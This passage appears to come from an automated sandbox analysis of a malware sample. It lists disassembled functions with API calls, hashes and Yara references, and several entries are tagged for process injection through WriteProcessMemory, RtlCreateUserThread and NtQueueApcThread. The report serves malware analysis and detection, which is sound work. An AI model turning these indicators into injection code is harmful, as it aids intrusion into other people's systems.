                • Opcode Fuzzy Hash: f984b88899510e62cbe18468345cbbe3864e5a8b2208229d8901ea8d74a4c81d
                • Instruction Fuzzy Hash: 8341E53172CF194EAF2CDA2D5449139BBD1E7E5621719032FD0AAC7395DE60D89342CA
                Function 0349F697 Relevance: 7.6, APIs: 5, Instructions: 149COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _fileno.LIBCMT ref: 0349F6B4
                  • Part of subcall function 034A2D5B: _errno.LIBCMT ref: 034A2D64
                  • Part of subcall function 034A2D5B: _invalid_parameter_noinfo.LIBCMT ref: 034A2D6F
                • _errno.LIBCMT ref: 0349F6C4
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _errno.LIBCMT ref: 0349F6E0
                • _isatty.LIBCMT ref: 0349F741
                • _getbuf.LIBCMT ref: 0349F74D
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_fileno_getbuf_getptd_noexit_invalid_parameter_noinfo_isatty
                • String ID:
                • API String ID: 304646821-0
                • Opcode ID: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
                • Instruction ID: e24a798af435ef5403b0e52380818f1fbe4c227bc22fa2a1107572271e043c0a
                • Opcode Fuzzy Hash: 872796ac68f0a2c990ec7574be4b8262460ebf94b78f5d760dc63ea6db356553
                • Instruction Fuzzy Hash: 7941C130214B084FEF58EF2CC8816667BE1FB48311B58469BD85ACF3A5E774D886C785
                Function 03496C53 Relevance: 7.6, APIs: 6, Instructions: 142COMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 03496C82
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • _snprintf.LIBCMT ref: 03496C9A
                  • Part of subcall function 0349C9C3: _errno.LIBCMT ref: 0349C9FA
                  • Part of subcall function 0349C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0349CA05
                • free.LIBCMT ref: 03496CB1
                  • Part of subcall function 0349C5CF: _errno.LIBCMT ref: 0349C5EF
                • malloc.LIBCMT ref: 03496D01
                • _snprintf.LIBCMT ref: 03496D19
                • free.LIBCMT ref: 03496D41
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                • String ID:
                • API String ID: 761449704-0
                • Opcode ID: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
                • Instruction ID: 944fa06059cdadc3be296c57bd2d3556db92d7aa593adc202cc30523df74504e
                • Opcode Fuzzy Hash: 6a658e466ab6b8aceff6db9366090ada30c858ea3a03489b9340fb8c77b34acf
                • Instruction Fuzzy Hash: 4331A72070CA4C0FEB69FB2C68552B97BD2E78D320745829FD49EC7356DE289C528789
                Function 0389E56C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1640621425-0
                • Opcode ID: f730a263443016ae00e5d3abb777c2b5d75680efc34748d8f50c96e33ab9094d
                • Instruction ID: cf98c0f8bb50a2a4654917f409006f0fc4c0db8c009dd2368b161de45e2bcfd1
                • Opcode Fuzzy Hash: f730a263443016ae00e5d3abb777c2b5d75680efc34748d8f50c96e33ab9094d
                • Instruction Fuzzy Hash: BA312B2130075446FE3ADEEB954422AFE51B784FE4F1C46A6DFA6C7B94EA78E081C301
                Function 038854F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0388553A
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • malloc.LIBCMT ref: 03885545
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D25C
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D261
                • free.LIBCMT ref: 0388562C
                • free.LIBCMT ref: 03885634
                • free.LIBCMT ref: 03885640
                • free.LIBCMT ref: 0388564D
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc$AllocHeap
                • String ID:
                • API String ID: 996410232-0
                • Opcode ID: d59479e3761b4ed4932fddf4fcb50f7cb5c8a88df08afafcd930e07321553fd4
                • Instruction ID: 8150df9d3ea76722faba40fbe3bbab207c2571ab6c0b2c38531adc5f640f8ef2
                • Opcode Fuzzy Hash: d59479e3761b4ed4932fddf4fcb50f7cb5c8a88df08afafcd930e07321553fd4
                • Instruction Fuzzy Hash: 7F315A2231478696EF15EFAA680076EAB59F78ABC8F4D84B1CD45CB701EE38C50BC310
                Function 038A8B58 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                • String ID:
                • API String ID: 2998201375-0
                • Opcode ID: bf73e22792d62dbb2a5a8665747f634ed6f1a0b77ca2749cdd90391f7f3d2e71
                • Instruction ID: 9fa9dda355871f4cc52c1d48509222ef442dac72480a2921fd61d8f202d6d842
                • Opcode Fuzzy Hash: bf73e22792d62dbb2a5a8665747f634ed6f1a0b77ca2749cdd90391f7f3d2e71
                • Instruction Fuzzy Hash: 2631D372215B8086EB60CF59E580229BFE5F784FC4F1C41A6EB99DBB54DB38C442CB10
                Function 0348ECE3 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0348ED04
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • free.LIBCMT ref: 0348ED3F
                • fwrite.LIBCMT ref: 0348ED80
                • fclose.LIBCMT ref: 0348ED88
                • free.LIBCMT ref: 0348ED95
                  • Part of subcall function 0349C5CF: _errno.LIBCMT ref: 0349C5EF
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$free$_callnewhfclosefwritemalloc
                • String ID:
                • API String ID: 1696598829-0
                • Opcode ID: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
                • Instruction ID: 54c5c91d89d5bdbb62ec02f8119be37c4943bdfe74d9a15384f428edf329bbee
                • Opcode Fuzzy Hash: 7f55edad75ff0bbfcf874ce00c2e3ecc23b72eec22338907bae6ad7bfe5dc563
                • Instruction Fuzzy Hash: 49219F25728F094FEB84FB2D845436E76D1FBD8214F44062FA14ACB384EE28CD46838A
                Function 034A78F3 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 034A7904
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A78FC
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno_errno
                • String ID:
                • API String ID: 2964073243-0
                • Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                • Instruction ID: 870a3144ce67cdeb62ab0ce994f54e374475ed6b011616d454620db0de961e49
                • Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                • Instruction Fuzzy Hash: 72F0283452DE094EFB28EBACC8907543E98FF60326F54428BD005CF1E5D77804458B19
                Function 038A84AC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 038A84BD
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A84B5
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno_errno
                • String ID:
                • API String ID: 2964073243-0
                • Opcode ID: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                • Instruction ID: 2c7bef50adb2855fa425661782c58dce2b74dcd4ea86c451e8507e8335fc21e1
                • Opcode Fuzzy Hash: bd3ba21443fd0c50c0a4bf83960b1fd102cab18f9fc9d7b57dd34df66812a4b6
                • Instruction Fuzzy Hash: 3AF04FF6612B8485FE09AFACC8903286A519B90B36F599786C629CA3D0CBBC45458726
                Function 0388D584 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: %s!%s
                • API String ID: 0-2935588013
                • Opcode ID: 87c3d06f94ebd67ad8421af21f0b978c410073bf873a78430363920c94c161ce
                • Instruction ID: c89c67f34ac08ddf985ea907177df18064495f032b13eeb874f019a971f0a9e4
                • Opcode Fuzzy Hash: 87c3d06f94ebd67ad8421af21f0b978c410073bf873a78430363920c94c161ce
                • Instruction Fuzzy Hash: 4251BF7A20474486DF24FFA6D0006697365F388F98F4881A6EF8E8B784DF38D94AC745
                Function 0389C178 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AccountInformationLookupToken_snprintf
                • String ID: %s\%s
                • API String ID: 2107350476-4073750446
                • Opcode ID: eab80e5e76cae2f62ff1f8dbdd5d2f372e8e47681e9448c49ff6034cb1a03876
                • Instruction ID: a01fbbd93bbb2e6471899dea83562c70fdabe68efe8c54fde2d75722f0e8c38a
                • Opcode Fuzzy Hash: eab80e5e76cae2f62ff1f8dbdd5d2f372e8e47681e9448c49ff6034cb1a03876
                • Instruction Fuzzy Hash: EF215776204FC1D5EB20CFA1E8447DAA764F788B88F488166EA8D5BB18DF39C309C740
                Function 038922A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64injectionCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 038922E6
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • WriteProcessMemory.KERNEL32 ref: 03892354
                • free.LIBCMT ref: 0389236A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$AllocHeapMemoryProcessWrite_callnewhfreemalloc
                • String ID: @
                • API String ID: 2776329143-2766056989
                • Opcode ID: f16ef9615b18e5dd8738061e84ba1a26569ff2d2e873f0e2120eda13e1fc476a
                • Instruction ID: e55b3a1467bfcc981ae8cc0490b7d55e30a4f967203dfaed073224e2fa7c2418
                • Opcode Fuzzy Hash: f16ef9615b18e5dd8738061e84ba1a26569ff2d2e873f0e2120eda13e1fc476a
                • Instruction Fuzzy Hash: 5F216D36304B4096DA21CF67F84065ABBA8F7C8F80F898566AF9C87B24DF38C146C744
                Function 03892B60 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: RtlCreateUserThread$ntdll.dll
                • API String ID: 1646373207-2935400652
                • Opcode ID: 15f0dc51ca9a3cf6381f817f0897e39ef6e2971f7222ba54e661cb1281496193
                • Instruction ID: f734eaf0f5ccfdc9cf52286e2d843e8f98a82d65c2608b50f910e558fa05fea7
                • Opcode Fuzzy Hash: 15f0dc51ca9a3cf6381f817f0897e39ef6e2971f7222ba54e661cb1281496193
                • Instruction Fuzzy Hash: 84016D72204B85C2DB60CF41F88474AB7A8F798B80F998179EA9D43B14DF38C695C740
                Function 03892538 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: NtQueueApcThread$ntdll
                • API String ID: 1646373207-1374908105
                • Opcode ID: d30a437afc947ebabf09e6ac1e31674b1d188f910b9a95b468b4020ddae0429a
                • Instruction ID: 96de1e3582812cff33e9b7f916779ec2c39987d2a4d9dd5e46f9c309064e0493
                • Opcode Fuzzy Hash: d30a437afc947ebabf09e6ac1e31674b1d188f910b9a95b468b4020ddae0429a
                • Instruction Fuzzy Hash: 4901A265300B4296EE00DB56F89035AA3A4F789BD0F888966EE5987B18DF38C251C700
                Function 0388FF70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsWow64Process$kernel32
                • API String ID: 1646373207-3789238822
                • Opcode ID: 0cc2c14e6aa49fa359cc5a066454d7c9afb306410e03beef033b30a086c723ab
                • Instruction ID: 881906a6601ecaa3e02cd33ded49826564699d2aecc7160bf563437a8a2409fa
                • Opcode Fuzzy Hash: 0cc2c14e6aa49fa359cc5a066454d7c9afb306410e03beef033b30a086c723ab
                • Instruction Fuzzy Hash: 8AE04FA172170283EE46DB95F89436AE364EB89795F486064FA4B46364EF3CC288CB54
                Function 038913A4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Wow64DisableWow64FsRedirection$kernel32
                • API String ID: 1646373207-736604160
                • Opcode ID: 5af8d57bb0da597028356cedd416d00d071a52161799d3d393d8390d6dec4b71
                • Instruction ID: 3fc168b525598fc059e58e9ad91b73518be65577847e41754ced035c160c232b
                • Opcode Fuzzy Hash: 5af8d57bb0da597028356cedd416d00d071a52161799d3d393d8390d6dec4b71
                • Instruction Fuzzy Hash: 24D05E9075170782EE069B92B8483AAD328EB8DB41F4C50A5981A06720EF3CC389C754
                Function 038913DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Wow64RevertWow64FsRedirection$kernel32
                • API String ID: 1646373207-3900151262
                • Opcode ID: 36b9989a3d64f40f2418a191821256b55915b9026f8b13fc485a792d70ae28d9
                • Instruction ID: c79faa7d988d628a19cce2f313a6c2465b61903d78335236aeec6cbe7f7bb6c0
                • Opcode Fuzzy Hash: 36b9989a3d64f40f2418a191821256b55915b9026f8b13fc485a792d70ae28d9
                • Instruction Fuzzy Hash: 0FD09E9075170782EE169B92B858766A354AB9DB41F4C50A5981A06360EF2CC399C754
                Function 0349C3B7 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                Download Yara Rule
                APIs
                • malloc.LIBCMT ref: 0349C3DA
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • malloc.LIBCMT ref: 0349C3E8
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C6A3
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C6A8
                • malloc.LIBCMT ref: 0349C40A
                • _snprintf.LIBCMT ref: 0349C425
                  • Part of subcall function 0349C9C3: _errno.LIBCMT ref: 0349C9FA
                  • Part of subcall function 0349C9C3: _invalid_parameter_noinfo.LIBCMT ref: 0349CA05
                • malloc.LIBCMT ref: 0349C440
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                • String ID:
                • API String ID: 2026495703-0
                • Opcode ID: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
                • Instruction ID: cd9919b96c929027ec6a378e7f313e6a35f8ef1ab272507209d8aaf0420ff664
                • Opcode Fuzzy Hash: 517d69768db3b6bf3d395ac3c09d0a903cb9471390505f3454a2c5542d334632
                • Instruction Fuzzy Hash: 79116D70A1CF084FEBA8EB6DA4852657AD1FB8C310F10455FE08EC7395EA349C4187C6
                Function 0349D9B3 Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 634798775-0
                • Opcode ID: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
                • Instruction ID: b9c0a690743c7f62077ea9926dc09804843c91fc9f81a282df42915d67979f06
                • Opcode Fuzzy Hash: b2a8dbbb867a594f76b04f7a59aae2ecf5df5d729cd9875792cf73ff4dabdb8d
                • Instruction Fuzzy Hash: E541ED30A1CF094FEF2CEE6D94551367AC1E75A210B18026FD49ACB265EAA0DC5386CA
                Function 03892A1C Relevance: 6.1, APIs: 4, Instructions: 96injectionCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$MemoryProcessWrite
                • String ID:
                • API String ID: 3937020117-0
                • Opcode ID: 758ccf515d5a04f9bcb79f0e870055d01cc9422dd9159b1358783e9b0281404f
                • Instruction ID: 6601833323eab4daf4b11382d77f3f98f7d58291f2f8a773d9b2e91862943dc2
                • Opcode Fuzzy Hash: 758ccf515d5a04f9bcb79f0e870055d01cc9422dd9159b1358783e9b0281404f
                • Instruction Fuzzy Hash: 82310726701B5596EF25EFB6A45076EA2D0BB88B84F4C44AADE8987724EF3CC205C741
                Function 03480517 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
